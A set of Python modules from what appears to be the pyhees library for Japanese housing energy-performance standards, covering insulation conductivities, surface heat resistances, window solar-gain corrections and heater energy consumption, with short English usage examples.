'RockWoolHA': 0.036, 'RockWoolHB': 0.035, 'RockWoolHC': 0.034}
material_dict.update(rock_wool_dict)
# インシュレーションファイバー断熱材ファイバーマット
material_dict.update({'InsulationFiberMat': 0.040})
# インシュレーションファイバー断熱材ファイバーボード
material_dict.update({'InsulationFiberBoard': 0.052})
# ビーズ法ポリスチレンフォーム断熱材:1号, 2号, 3号, 4号
eps_dict = {'EPS1': 0.034, 'EPS2': 0.036, 'EPS3': 0.038, 'EPS4': 0.041}
material_dict.update(eps_dict)
# 押出法ポリスチレンフォーム断熱材:1種bA, 1種bB, 1種bC, 2種bA, 2種bB, 2種bC,
# 3種aA, 3種aB, 3種aC, 3種aD,
# 3種bA, 3種bB, 3種bC, 3種bD
xps_dict = {'XPS1bA': 0.04, 'XPS1bB': 0.038, 'XPS1bC': 0.036, 'XPS2bA': 0.034, 'XPS2bB': 0.032, 'XPS2bC': 0.03,
'XPS3aA': 0.028, 'XPS3aB': 0.026, 'XPS3aC': 0.024, 'XPS3aD': 0.022,
'XPS3bA': 0.028, 'XPS3bB': 0.026, 'XPS3bC': 0.024, 'XPS3bD': 0.022}
material_dict.update(xps_dict)
# 硬質ウレタンフォーム断熱材:1種, 2種1号,
# 2種2号, 2種3号, 2種4号
puf_dict = {'PUF1': 0.029, 'PUF2_1': 0.023,
'PUF2_2': 0.024, 'PUF2_3': 0.027, 'PUF2_4': 0.028}
material_dict.update(puf_dict)
# 吹付け硬質ウレタンフォーム:A種1,
# A種1H, A種3
spuf_dict = {'SprayedPUFA1': 0.034,
'SprayedPUFA1H': 0.026, 'SprayedPUFA3': 0.04}
material_dict.update(spuf_dict)
# ポリエチレンフォーム断熱材:1種1号, 1種2号,
# 2種, 3種
polyethylene_dict = {'PolyethyleneFoam1_1': 0.042, 'PolyethyleneFoam1_2': 0.042,
'PolyethyleneFoam2': 0.038, 'PolyethyleneFoam3': 0.034}
material_dict.update(polyethylene_dict)
# フェノールフォーム断熱材:1種1号AⅠAⅡ, 1種1号BⅠBⅡ, 1種1号CⅠCⅡ, 1種1号DⅠDⅡ, 1種1号EⅠEⅡ,
# 1種2号AⅠAⅡ, 1種2号BⅠBⅡ, 1種2号CⅠCⅡ, 1種2号DⅠDⅡ, 1種2号EⅠEⅡ,
# 1種3号AⅠAⅡ, 1種3号BⅠBⅡ, 1種3号CⅠCⅡ, 1種3号DⅠDⅡ, 1種3号EⅠEⅡ,
# 2種1号AⅠAⅡ, 2種2号AⅠAⅡ, 2種3号AⅠAⅡ, 3種1号AⅠAⅡ
phenolic_dict = {'PhenolicFoam11_A1_A2': 0.022, 'PhenolicFoam11_B1_B2': 0.021, 'PhenolicFoam11_C1_C2': 0.02, 'PhenolicFoam11_D1_D2': 0.019, 'PhenolicFoam11_E1_E2': 0.018,
'PhenolicFoam12_A1_A2': 0.022, 'PhenolicFoam12_B1_B2': 0.021, 'PhenolicFoam12_C1_C2': 0.02, 'PhenolicFoam12_D1_D2': 0.019, 'PhenolicFoam12_E1_E2': 0.018,
'PhenolicFoam13_A1_A2': 0.022, 'PhenolicFoam13_B1_B2': 0.021, 'PhenolicFoam13_C1_C2': 0.02, 'PhenolicFoam13_D1_D2': 0.019, 'PhenolicFoam13_E1_E2': 0.018,
'PhenolicFoam21_A1_A2': 0.036, 'PhenolicFoam22_A1_A2': 0.034, 'PhenolicFoam23_A1_A2': 0.028, 'PhenolicFoam31_A1_A2': 0.035}
material_dict.update(phenolic_dict)
try:
return material_dict[material]
except KeyError:
raise ValueError(material)
def calc_R_si_R_se(part, Outside):
"""表3.1と3.2から表面熱伝達抵抗を求める
Args:
        part(str): 'Roof'(屋根)または'Ceiling'(天井)または'ExternalWall'(外壁)または'Floor'(床)または
'BoundaryWall'(界壁)または'BoundaryCeiling'(上階側界床)または'BoundaryFloor'(下階側界床)
Outside(str): 室外側は外気かどうか
'Yes'または'No'
Returns:
tuple: 熱的境界内側の表面熱伝達抵抗(m2K/W), 熱的境界外側の表面熱伝達抵抗(m2K/W)
"""
if part == 'Roof' or part == 'Ceiling' or part == 'ExternalWall' or part == 'Floor':
return get_table_3_1(part, Outside)
elif part == 'BoundaryWall' or part == 'BoundaryCeiling' or part == 'BoundaryFloor':
return get_table_3_2(part)
else:
raise ValueError(part)
def get_table_3_1(part, Outside):
"""表3.1 表面熱伝達抵抗
Args:
        part(str): 'Roof'(屋根)または'Ceiling'(天井)または'ExternalWall'(外壁)または'Floor'(床)
Outside(str): 室外側は外気かどうか
'Yes'または'No'
Returns:
tuple: 熱的境界内側(室内側)の表面熱伝達抵抗(m2K/W), 熱的境界外側(外気側)の表面熱伝達抵抗(m2K/W)
"""
# 熱的境界内側 屋根 天井
# 外壁 床
R_si_dict = {'Roof': 0.09, 'Ceiling': 0.09,
'ExternalWall': 0.11, 'Floor': 0.15}
# 熱的境界外側 屋根 天井
# 外壁 床
R_se_dict = {'Roof': {'Yes': 0.04, 'No': 0.09}, 'Ceiling': {'Yes': 0.00, 'No': 0.09}, # 天井が外気に直接接することはない?表中の'-'とは
'ExternalWall': {'Yes': 0.04, 'No': 0.11}, 'Floor': {'Yes': 0.04, 'No': 0.15}}
try:
R_si = R_si_dict[part]
R_se_out = R_se_dict[part]
try:
R_se = R_se_out[Outside]
return R_si, R_se
except KeyError:
raise ValueError(Outside)
except KeyError:
raise ValueError(part)
def get_table_3_2(part):
"""表3.2 表面熱伝達抵抗(界壁・界床の場合)
Args:
        part(str): 'BoundaryWall'(界壁)または'BoundaryCeiling'(上階側界床)または'BoundaryFloor'(下階側界床)
Returns:
tuple: 対象住戸の室内側表面熱伝達抵抗(m2K/W), 隣接住戸の室内側表面熱伝達抵抗(m2K/W)
"""
# 熱的境界外側=隣接住戸の室内側表面熱伝達抵抗・熱的境界内側=対象住戸の室内側表面熱伝達抵抗???
# 対象住戸の室内側表面熱伝達抵抗
# 界壁
# 上階側界床 下階側界床
R_si_dict = {'BoundaryWall': 0.11,
'BoundaryCeiling': 0.09, 'BoundaryFloor': 0.15}
# 隣接住戸の室内側表面熱伝達抵抗
# 界壁
# 上階側界床 下階側界床
R_se_dict = {'BoundaryWall': 0.11,
'BoundaryCeiling': 0.09, 'BoundaryFloor': 0.15}
try:
return R_si_dict[part], R_se_dict[part]
except KeyError:
raise ValueError(part)
def get_table_4(air_type):
"""表4 外皮の内側にある空気層の熱抵抗
Args:
air_type(str): 空気層の種類
'AirTight'(面材で密閉された空気層)または'OnSiteNonConnected'(他の空間と連通していない空気層)または
'OnSiteConnected'(他の空間と連通している空気層)
Returns:
float: 外皮の内側にある空気層の熱抵抗
"""
R_dict = {'AirTight': 0.09, 'OnSiteNonConnected': 0, 'OnSiteConnected': 0}
try:
return R_dict[air_type]
except KeyError:
raise ValueError(air_type)
```
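For illustration only (not a worked example from the standard), the tables above can be combined into a simple series-resistance U-value for an external wall of 100 mm concrete, 50 mm HGW16K glass wool and 12.5 mm plasterboard:
```python
from pyhees.section3_3_a import calc_lambda, calc_R_si_R_se

layers = [('Concrete', 0.100), ('HGW16K', 0.050), ('GB_R_D_L_NC', 0.0125)]  # (material, thickness in m)
R_si, R_se = calc_R_si_R_se('ExternalWall', 'Yes')

R_total = R_si + sum(d / calc_lambda(material) for material, d in layers) + R_se
U = 1 / R_total
print(round(U, 3))  # heat transmission coefficient, W/(m2 K)
```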
#### File: src/pyhees/section3_4_b_2.py
```python
def get_f_H_i():
"""開口部iの暖房期の取得日射熱補正係数
Args:
Returns:
float: 開口部iの暖房期の取得日射熱補正係数
"""
return 0.51
def get_f_C_i():
"""開口部iの冷房期の取得日射熱補正係数
Args:
Returns:
float: 開口部iの冷房期の取得日射熱補正係数
"""
return 0.93
### HEESENV-66(2020/08/27)
# 簡易計算では仕様変更前の計算方法を用いるため、仕様変更前のものを残す
# 以下、仕様変更前
###
# ============================================================================
# 第三章 暖冷房負荷と外皮性能
# 第四節 日射熱取得率
# Ver.11(住宅・住戸の外皮性能の計算プログラム Ver.02.01~)
# ----------------------------------------------------------------------------
# 付録B 大部分がガラスで構成されている窓等の開口部における取得日射熱補正係数
# ----------------------------------------------------------------------------
# B.2 ガラスの仕様の区分
# ============================================================================
def get_glass_spec_category(glass_spec_name):
"""ガラスの仕様の区分はガラスの仕様に応じて返す
Args:
glass_spec_name(str): ガラスの仕様
Returns:
int: ガラスの仕様の区分はガラスの仕様に応じて返す
"""
# 表3 ガラスの仕様の区分
table_3 = {
'2枚以上のガラス表面にLow-E膜を使用したLow-E三層複層ガラス(日射取得型)': 6,
'2枚以上のガラス表面にLow-E膜を使用したLow-E三層複層ガラス(日射遮蔽型)': 3,
'Low-E三層複層ガラス(日射取得型)': 6,
'Low-E三層複層ガラス(日射遮蔽型)': 6,
'Low-E二層複層ガラス(日射取得型)': 3,
'Low-E二層複層ガラス(日射遮蔽型)': 4,
'二層複層ガラス': 2,
'単板ガラス2枚を組み合わせたもの': 2,
'単板ガラス': 1,
'単板ガラスと複層ガラスを組み合わせたもの': 5,
'単板ガラスとLow-E複層ガラスを組み合わせたもの(日射取得型)': 7,
'単板ガラスとLow-E複層ガラスを組み合わせたもの(日射遮蔽型)': 6,
}
return table_3[glass_spec_name]
```
#### File: src/pyhees/section3_4_b_3.py
```python
def get_f_H_i(region, direction, y1, y2, z):
"""開口部iの暖房期の取得日射熱補正係数
Args:
region(int): 省エネルギー地域区分
direction(str): 外皮の部位の方位
y1(float): 日除け下端から窓上端までの垂直方向の距離 (mm)
y2(float): 窓の開口高さ寸法 (mm)
z(float): 壁面からの日除けの張り出し寸法(ひさし等のオーバーハング型日除けの出寸法は壁表面から先端までの寸法とする)(mm)
Returns:
float: 開口部iの暖房期の取得日射熱補正係数
"""
# 暖房期における1地域から7地域までの南東面・南面・南西面 --- 式(1a)
if (region in [1,2,3,4,5,6,7] and direction in ['南東', '南', '南西']):
return min(0.01 * (5 + 20 * ((3*y1 + y2) / z)), 0.72)
# 暖房期における1地域から7地域までの南東面・南面・南西面以外 --- 式(1b)
elif (region in [1,2,3,4,5,6,7] and not(direction in ['南東', '南', '南西'])):
return min(0.01 * (10 + 15 * ((2*y1 + y2) / z)), 0.72)
    else:
        raise ValueError("invalid value in region or direction")
def get_f_C_i(region, direction, y1, y2, z):
"""開口部iの冷房期の取得日射熱補正係数
Args:
region(int): 省エネルギー地域区分
direction(str): 外皮の部位の方位
y1(float): 日除け下端から窓上端までの垂直方向の距離 (mm)
y2(float): 窓の開口高さ寸法 (mm)
z(float): 壁面からの日除けの張り出し寸法(ひさし等のオーバーハング型日除けの出寸法は壁表面から先端までの寸法とする)(mm)
Returns:
float: 開口部iの冷房期の取得日射熱補正係数
"""
Direction_dict = {'Top':'上面', 'N':'北', 'NE':'北東', 'E':'東', 'SE':'南東',
'S':'南', 'SW':'南西', 'W':'西', 'NW':'北西', 'Bottom':'下面'}
# 冷房期における1地域から7地域までの南面 --- 式(2a)
if (region in [1,2,3,4,5,6,7] and Direction_dict[direction] in ['南']):
return min(0.01 * (24 + 9 * ((3*y1 + y2) / z)), 0.93)
# 冷房期における1地域から7地域までの南面以外及び8地域の南東面・南面・南西面以外 --- 式(2b)
elif ((region in [1,2,3,4,5,6,7] and not(Direction_dict[direction] in ['南'])) or (region == 8 and not(Direction_dict[direction] in ['南東', '南', '南西']))):
return min(0.01 * (16 + 24 * ((2*y1 + y2) / z)), 0.93)
# 冷房期における8地域の南東面・南面・南西面 --- 式(2c)
elif (region == 8 and Direction_dict[direction] in ['南東', '南', '南西']):
return min(0.01 * (16 + 19 * ((2*y1 + y2) / z)), 0.93)
    else:
        raise ValueError("invalid value in region or direction")
```
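A sketch of both correction factors for a window in region 6 with a 600 mm overhang and hypothetical geometry. Note that, as written above, `get_f_H_i` compares `direction` against the Japanese labels directly while `get_f_C_i` expects the keys of `Direction_dict` ('S', 'SE', ...); the example follows each function's own convention.
```python
from pyhees.section3_4_b_3 import get_f_H_i, get_f_C_i

# Hypothetical geometry: 500 mm from the shade to the window head, 1,100 mm opening height.
f_H = get_f_H_i(region=6, direction='南', y1=500.0, y2=1100.0, z=600.0)
f_C = get_f_C_i(region=6, direction='S', y1=500.0, y2=1100.0, z=600.0)
print(f_H, f_C)  # 0.72 (capped) and 0.63 for these inputs
```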
#### File: src/pyhees/section3_4_common.py
```python
def get_eta_H_i(gamma_H_i, U_i):
"""一般部位の暖房期の日射熱取得率(熱貫流率から計算) (1)
Args:
gamma_H_i(float): 開口部の暖房期の日除けの効果係数 (-)
U_i(float): 開口部の熱貫流率 (W/m2K)
Returns:
float: 一般部位の暖房期の日射熱取得率(熱貫流率から計算) ((W/m2)/(W/m2))(1)
"""
return 0.034 * gamma_H_i * U_i
def get_eta_C_i(gamma_C_i, U_i):
"""一般部位の冷房期の日射熱取得率(熱貫流率から計算) (2)
Args:
gamma_C_i(float): 一般部位iの冷房期の日除けの効果係数
U_i(float): 一般部位iの熱貫流率 (W/m2K)
Returns:
float: 一般部位の冷房期の日射熱取得率(熱貫流率から計算) ((W/m2)/(W/m2))(2)
"""
return 0.034 * gamma_C_i * U_i
```
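A one-line sanity check of the opaque-part solar gain rates (a sketch with an assumed U-value and no shading, i.e. gamma = 1.0):
```python
from pyhees.section3_4_common import get_eta_H_i, get_eta_C_i

U_i = 0.53  # assumed heat transmission coefficient, W/(m2 K)
print(get_eta_H_i(gamma_H_i=1.0, U_i=U_i))  # 0.034 * 1.0 * 0.53
print(get_eta_C_i(gamma_C_i=1.0, U_i=U_i))
```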
#### File: src/pyhees/section4_4_a.py
```python
def get_q_max_H(A_HCZ):
"""最大暖房能力
Args:
A_HCZ(float): 暖冷房区画の床面積
Returns:
float: 最大暖房能力
"""
return 240.1 * A_HCZ # (1)
# ============================================================================
# A.3 連続運転時最小能力
# ============================================================================
def get_q_min_H(q_max_H):
"""連続運転時最小能力
Args:
q_max_H(float): 最大暖房能力
Returns:
float: 連続運転時最小能力
"""
q_min_H = 0.4334 * q_max_H - 540.1 # (2)
return max(0.0, q_min_H)
# ============================================================================
# A.4 定格燃料効率
# ============================================================================
def get_e_rtd_H_default():
"""定格燃料効率
Args:
Returns:
float: 定格燃料効率
"""
return 0.860
def get_e_rtd_H(e_rtd_H_raw):
    """定格燃料効率(入力値を1/1000の単位に丸める)
    Args:
        e_rtd_H_raw(float): 丸め前の定格燃料効率
    Returns:
        float: 定格燃料効率
    """
    return round(e_rtd_H_raw * 1000) / 1000
# ============================================================================
# A.5 定格暖房消費電力
# ============================================================================
def get_P_rtd_H(q_max_H):
"""定格暖房消費電力
Args:
q_max_H(float): 最大暖房能力
Returns:
float: 定格暖房消費電力
"""
return 3.13 / 1000 * q_max_H # (3)
# ============================================================================
# A.6 断続時消費電力
# ============================================================================
def get_P_itm_H():
"""断続時消費電力
Args:
Returns:
float: 断続時消費電力
"""
return 40.0
# ============================================================================
# A.7 複数の FF 暖房機が設置される場合の仕様の決定方法
# ============================================================================
def get_e_rtd_from_multi_devices(e_rtd_list):
"""複数の FF 暖房機が設置される場合の仕様の決定方法
Args:
e_rtd_list(list: list: list): 定格エネルギー消費効率の配列
Returns:
float: 複数の FF 暖房機が設置される場合の仕様の決定方法
"""
return min(e_rtd_list)
```
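The appendix-A functions are meant to be chained; the sketch below derives a default FF-heater specification for an assumed 21.53 m2 heated zone:
```python
from pyhees.section4_4_a import (get_q_max_H, get_q_min_H, get_e_rtd_H_default,
                                 get_P_rtd_H, get_P_itm_H)

A_HCZ = 21.53                     # assumed floor area of the heated zone, m2
q_max_H = get_q_max_H(A_HCZ)      # maximum heating capacity, W
q_min_H = get_q_min_H(q_max_H)    # minimum continuous output, W
print(q_max_H, q_min_H, get_e_rtd_H_default(), get_P_rtd_H(q_max_H), get_P_itm_H())
```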
#### File: src/pyhees/section4_4.py
```python
import numpy as np
from pyhees.section4_1_Q import get_Q_T_H_d_t_i
# ============================================================================
# 5. 最大暖房出力
# ============================================================================
def get_Q_max_H_d_t(q_max_H):
"""最大暖房出力
Args:
q_max_H(float): 最大暖房能力
Returns:
ndarray: 最大暖房出力
"""
return np.ones(24 * 365) * q_max_H * 3600 * 10 ** (-6) # (1)
# ============================================================================
# 6. 暖房エネルギー消費量
# ============================================================================
# ============================================================================
# 6.1 消費電力量
# ============================================================================
def calc_E_E_H_d_t(q_max_H, q_min_H, P_rtd_H, P_itm_H, L_H_d_t):
"""消費電力量
Args:
q_max_H(float): 最大暖房能力
q_min_H(float): 連続運転時最小能力
P_rtd_H(float): 定格暖房消費電力
P_itm_H(float): 断続時消費電力
L_H_d_t(ndarray): 暖冷房区画の1時間当たりの暖房負荷
Returns:
ndarray: 消費電力量
"""
# 最大暖房出力
Q_max_H_d_t = get_Q_max_H_d_t(q_max_H)
# 処理暖房負荷
Q_T_H_d_t = get_Q_T_H_d_t_i(Q_max_H_d_t, L_H_d_t)
# 消費電力量
tmp1 = P_rtd_H * Q_T_H_d_t / Q_max_H_d_t * 10 ** (-3)
tmp1[Q_T_H_d_t < q_min_H * 3600 * 10 ** (-6)] = 0.0
tmp2 = (P_rtd_H * Q_T_H_d_t / Q_max_H_d_t + P_itm_H) * 10 ** (-3)
tmp2[Q_T_H_d_t >= q_min_H * 3600 * 10 ** (-6)] = 0.0
E_E_H_d_t = tmp1 + tmp2
# ただし、Q_T_H_d_tが0の場合は0
E_E_H_d_t[Q_T_H_d_t == 0] = 0
return E_E_H_d_t
# ============================================================================
# 6.2 ガス消費量
# ============================================================================
def calc_E_G_H_d_t(fuel, q_max_H, e_rtd_H, L_H_d_t):
"""ガス消費量
Args:
        fuel(string): 'G'か'K'の値をとる
q_max_H(float): 最大暖房能力
e_rtd_H(float): 定格暖房エネルギー消費効率
L_H_d_t(ndarray): 暖冷房区画の1時間当たりの暖房負荷
Returns:
ndarray: ガス消費量
Raises:
ValueError: fuel が 'G'か'K' 以外の場合に発生する
"""
if fuel == 'G':
return calc_E_F_H_d_t(q_max_H, e_rtd_H, L_H_d_t)
elif fuel == 'K':
return np.zeros(24 * 365)
else:
raise ValueError(fuel)
# ============================================================================
# 6.3 灯油消費量
# ============================================================================
def calc_E_K_H_d_t(fuel, q_max_H, e_rtd_H, L_H_d_t):
"""灯油消費量
Args:
        fuel(string): 'G'か'K'の値をとる
q_max_H(float): 最大暖房能力
e_rtd_H(float): 定格暖房エネルギー消費効率
L_H_d_t(ndarray): 暖冷房区画の1時間当たりの暖房負荷
Returns:
ndarray: 灯油消費量
Raises:
ValueError: fuel が 'G'か'K' 以外の場合に発生する
"""
if fuel == 'K':
return calc_E_F_H_d_t(q_max_H, e_rtd_H, L_H_d_t)
elif fuel == 'G':
return np.zeros(24 * 365)
else:
raise ValueError(fuel)
# ============================================================================
# 6.4 その他の燃料による一次エネルギー消費量
# ============================================================================
def get_E_M_H_d_t():
"""その他の燃料による一次エネルギー消費量
Args:
Returns:
ndarray: その他の燃料による一次エネルギー消費量
"""
return np.zeros(24 * 365)
# ============================================================================
# 7.燃料消費量
# ============================================================================
def calc_E_F_H_d_t(q_max_H, e_rtd_H, L_H_d_t):
"""燃料消費量
Args:
q_max_H(float): 最大暖房能力
e_rtd_H(float): 定格暖房エネルギー消費効率
L_H_d_t(ndarray): 暖冷房区画の1時間当たりの暖房負荷
Returns:
ndarray: 燃料消費量
"""
# 最大暖房出力
Q_max_H_d_t = get_Q_max_H_d_t(q_max_H)
# 処理暖房負荷
Q_T_H_d_t = get_Q_T_H_d_t_i(Q_max_H_d_t, L_H_d_t)
E_F_H_d_t = Q_T_H_d_t / e_rtd_H # (3)
return E_F_H_d_t
def calc_Q_UT_H_d_t(q_max_H, L_H_d_t):
"""未処理暖房負荷
Args:
q_max_H(float): 最大暖房能力
L_H_d_t(ndarray): 暖冷房区画の1時間当たりの暖房負荷
Returns:
ndarray: 未処理暖房負荷
"""
# 最大暖房出力
Q_max_H_d_t = get_Q_max_H_d_t(q_max_H)
# 処理暖房負荷
Q_T_H_d_t = get_Q_T_H_d_t_i(Q_max_H_d_t, L_H_d_t)
# 未処理暖房負荷
Q_UT_H_d_t = L_H_d_t - Q_T_H_d_t
return Q_UT_H_d_t
```
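A sketch of the hourly energy calculation under a synthetic heating load (2 MJ/h during January only); it assumes the full `pyhees` package is importable, since `calc_E_E_H_d_t` relies on `section4_1_Q` internally:
```python
import numpy as np
from pyhees.section4_4 import calc_E_E_H_d_t, calc_E_F_H_d_t
from pyhees.section4_4_a import (get_q_max_H, get_q_min_H, get_P_rtd_H,
                                 get_P_itm_H, get_e_rtd_H_default)

A_HCZ = 21.53
q_max_H = get_q_max_H(A_HCZ)
L_H_d_t = np.zeros(24 * 365)
L_H_d_t[:31 * 24] = 2.0           # heating load, MJ/h

E_E = calc_E_E_H_d_t(q_max_H, get_q_min_H(q_max_H), get_P_rtd_H(q_max_H), get_P_itm_H(), L_H_d_t)
E_F = calc_E_F_H_d_t(q_max_H, get_e_rtd_H_default(), L_H_d_t)
print(E_E.sum(), E_F.sum())       # annual electricity (kWh) and fuel (MJ) consumption
```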
#### File: src/pyhees/section4_6_a.py
```python
def get_q_rtd_H(q_rq_H, A_HCZ, f_cT, f_cI):
"""定格暖房能力
Args:
q_rq_H(float): 単位面積当たりの必要暖房能力
A_HCZ(float): 暖冷房区画の床面積
f_cT(float): 外気温度補正係数
f_cI(float): 間歇運転能力補正係数
Returns:
float: 定格暖房能力
"""
return q_rq_H * A_HCZ * f_cT * f_cI # (1)
# 単位面積当たりの必要暖房能力
def calc_q_rq_H(region):
"""単位面積当たりの必要暖房能力
Args:
region(int): 地域区分
Returns:
float: 単位面積当たりの必要暖房能力
"""
table_a_2 = get_table_a_2()
return table_a_2[region - 1]
# 外気温度補正係数
def get_f_cT(region):
"""外気温度補正係数
Args:
region(int): 地域区分
Returns:
float: 外気温度補正係数
"""
return 1.05
# 間歇運転能力補正係数
def calc_f_cI(mode, R_type):
"""間歇運転能力補正係数
Args:
mode(str): 運転方式
R_type(string): 居室の形式
Returns:
float: 間歇運転能力補正係数
Raises:
ValueError: modeが'ろ', '連続', 'は', '間歇'以外の場合に発生
ValueError: R_typeが'主たる居室', 'その他の居室'以外の場合に発生
"""
if mode in ['ろ', '連続']:
y = 0
elif mode in ['は', '間歇']:
y = 1
else:
raise ValueError(mode)
if R_type == '主たる居室':
x = 0
elif R_type == 'その他の居室':
x = 1
else:
raise ValueError(R_type)
table_a_3 = get_table_a_3()
return table_a_3[y][x]
def get_table_a_2():
"""表A.2 単位面積当たりの必要暖房能力
Args:
Returns:
list: 単位面積当たりの必要暖房能力
"""
# 表A.2 単位面積当たりの必要暖房能力
table_a_2 = [
139.3,
120.7,
111.3,
119.0,
126.6,
106.5,
112.9
]
return table_a_2
def get_table_a_3():
"""表A.3 間歇運転能力補正係数
Args:
Returns:
list: 間歇運転能力補正係数
"""
# 表A.3 間歇運転能力補正係数
table_a_3 = [
(1.0, 1.0),
(3.034, 4.805)
]
return table_a_3
# ============================================================================
# A.3 蓄熱効率
# ============================================================================
def get_e_rtd_H():
"""蓄熱効率
Args:
Returns:
float: 蓄熱効率
"""
return 0.850
```
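A sketch of the sizing chain for a heater serving the main living room in region 4 with intermittent operation (the floor area is an assumed value):
```python
from pyhees.section4_6_a import calc_q_rq_H, get_f_cT, calc_f_cI, get_q_rtd_H

region, A_HCZ = 4, 21.53
q_rq_H = calc_q_rq_H(region)                   # required capacity per floor area, W/m2
f_cT = get_f_cT(region)
f_cI = calc_f_cI('間歇', '主たる居室')
print(get_q_rtd_H(q_rq_H, A_HCZ, f_cT, f_cI))  # rated heating capacity, W
```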
#### File: src/pyhees/section4_7_c.py
```python
import numpy as np
import pyhees.section4_7_h as appendix_H
# ============================================================================
# C.2 エネルギー消費量
# ============================================================================
# ============================================================================
# C.2.1 消費電力量
# ============================================================================
def calc_E_E_hs(Q_out_H_hs, r_WS_hs):
"""消費電力量 (1)
Args:
Q_out_H_hs(ndarray): 1時間当たりの熱源機暖房出力 (MJ/h)
r_WS_hs(ndarray): 1時間平均の温水暖房用熱源機の温水供給運転率
Returns:
ndarray: 消費電力量
"""
# 電気ヒーターの消費電力量
E_E_hs_htr = get_E_E_hs_htr(Q_out_H_hs)
# 送水ポンプの消費電力量
E_E_hs_pmp = calc_E_E_hs_pmp(r_WS_hs)
return E_E_hs_htr + E_E_hs_pmp
def get_E_E_hs_htr(Q_out_H_hs):
"""電気ヒーターの消費電力量 (2)
Args:
Q_out_H_hs(ndarray): 1時間当たりの熱源機暖房出力 (MJ/h)
Returns:
ndarray: 電気ヒーターの消費電力量 (2)
"""
return Q_out_H_hs * 10 ** 3 / 3600
def calc_E_E_hs_pmp(r_WS_hs):
"""送水ポンプの消費電力量 (3)
Args:
r_WS_hs(ndarray): 1時間平均の温水暖房用熱源機の温水供給運転率
Returns:
ndarray: 送水ポンプの消費電力量
"""
# 送水ポンプの消費電力
P_hs_pmp = get_P_hs_pmp()
return P_hs_pmp * r_WS_hs * 10 ** (-3)
def get_P_hs_pmp():
"""送水ポンプの消費電力
Args:
Returns:
float: 送水ポンプの消費電力
"""
return 90
# ============================================================================
# C.2.2 ガス消費量
# ============================================================================
def get_E_G_hs():
"""ガス消費量
Args:
Returns:
ndarray: ガス消費量
"""
return np.zeros(24 * 365)
# ============================================================================
# C.2.3 灯油消費量
# ============================================================================
def get_E_K_hs():
"""灯油消費量
Args:
Returns:
ndarray: 灯油消費量
"""
return np.zeros(24 * 365)
# ============================================================================
# C.2.4 その他の一次エネルギー消費量
# ============================================================================
def get_E_M_hs():
"""その他の一次エネルギー消費量
Args:
Returns:
ndarray: その他の一次エネルギー消費量
"""
return np.zeros(24 * 365)
# ============================================================================
# C.3 最大暖房出力
# ============================================================================
def calc_Q_max_H_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh):
"""最大暖房出力 (4)
Args:
region(int): 省エネルギー地域区分
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は'
mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は'
has_MR_hwh(bool): 温水暖房の放熱器を主たる居室に設置する場合はTrue
has_OR_hwh(bool): 温水暖房の放熱器をその他の居室に設置する場合はTrue
Returns:
ndarray: 最大暖房出力
"""
# 定格能力
q_rtd_hs = get_q_rtd_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh)
return np.ones(24*365) * q_rtd_hs * 3600 / (10 ** 6)
def get_q_rtd_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh):
"""温水暖房用熱源機の定格能力
Args:
region(int): 省エネルギー地域区分
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は'
mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は'
has_MR_hwh(bool): 温水暖房の放熱器を主たる居室に設置する場合はTrue
has_OR_hwh(bool): 温水暖房の放熱器をその他の居室に設置する場合はTrue
Returns:
float: 温水暖房用熱源機の定格能力
"""
# 付録Hに定める温水暖房用熱源機の最大能力 q_max_hs に等しい
return appendix_H.calc_q_max_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh)
```
#### File: src/pyhees/section4_7_d.py
```python
import pyhees.section4_7_h as appendix_H
import numpy as np
# ============================================================================
# D.2 エネルギー消費量
# ============================================================================
# ============================================================================
# D.2.1 消費電力量
# ============================================================================
def calc_E_E_hs(Q_out_H_hs, Q_max_H_hs, Q_dmd_H_hs_d_t, Theta_SW_hs, Theta_ex, q_rtd_hs):
"""1時間当たりの消費電力量 (1)
Args:
Q_out_H_hs(ndarray): 1時間当たりの温水暖房用熱源機の暖房出力 (MJ/h)
Q_max_H_hs(ndarray): 熱源機の最大暖房出力 (MJ/h)
Q_dmd_H_hs_d_t(ndarray): 1時間当たりの熱源機の熱需要 (MJ/h)
Theta_SW_hs(ndarray): 温水暖房用熱源機の往き温水温度
Theta_ex(ndarray): 外気温度
q_rtd_hs(float): 温水暖房用熱源機の定格能力 (W)
Returns:
ndarray: 1時間当たりの消費電力量
"""
# 定格効率
e_rtd = get_e_rtd()
# 定格消費電力
P_rtd_hs = get_P_rtd_hs(q_rtd_hs, e_rtd)
# 1 時間平均の温水暖房用熱源機の効率
e_hs = calc_e_hs(Q_max_H_hs, Theta_SW_hs, Theta_ex, Q_out_H_hs, P_rtd_hs)
# 消費電力量
E_E_hs = Q_out_H_hs / e_hs * 10 ** 3 / 3600
E_E_hs[Q_dmd_H_hs_d_t == 0] = 0
return E_E_hs
def calc_e_hs(Q_max_H_hs, Theta_SW_hs, Theta_ex, Q_out_H_hs, P_rtd_hs):
"""1時間平均の温水暖房用熱源機の効率 (2)
Args:
Q_max_H_hs(ndarray): 熱源機の最大暖房出力 (MJ/h)
Theta_SW_hs(ndarray): 温水暖房用熱源機の往き温水温度
Theta_ex(ndarray): 外気温度
Q_out_H_hs(ndarray): 1時間当たりの温水暖房用熱源機の暖房出力 (MJ/h)
P_rtd_hs(float): 温水暖房用熱源機の定格消費電力 (W)
Returns:
ndarray: 1時間平均の温水暖房用熱源機の効率
"""
# 1時間平均の効率比
e_r_hs = get_e_r_hs(Theta_SW_hs, Theta_ex, Q_out_H_hs, Q_max_H_hs)
# 最大消費電力
P_max_hs = get_P_max_hs(P_rtd_hs)
return (Q_max_H_hs * 10 ** 6 / 3600) / P_max_hs * e_r_hs
def get_P_max_hs(P_rtd_hs):
"""最大消費電力 (3)
Args:
P_rtd_hs(float): 温水暖房用熱源機の定格消費電力 (W)
Returns:
float: 最大消費電力
"""
return P_rtd_hs / 0.6
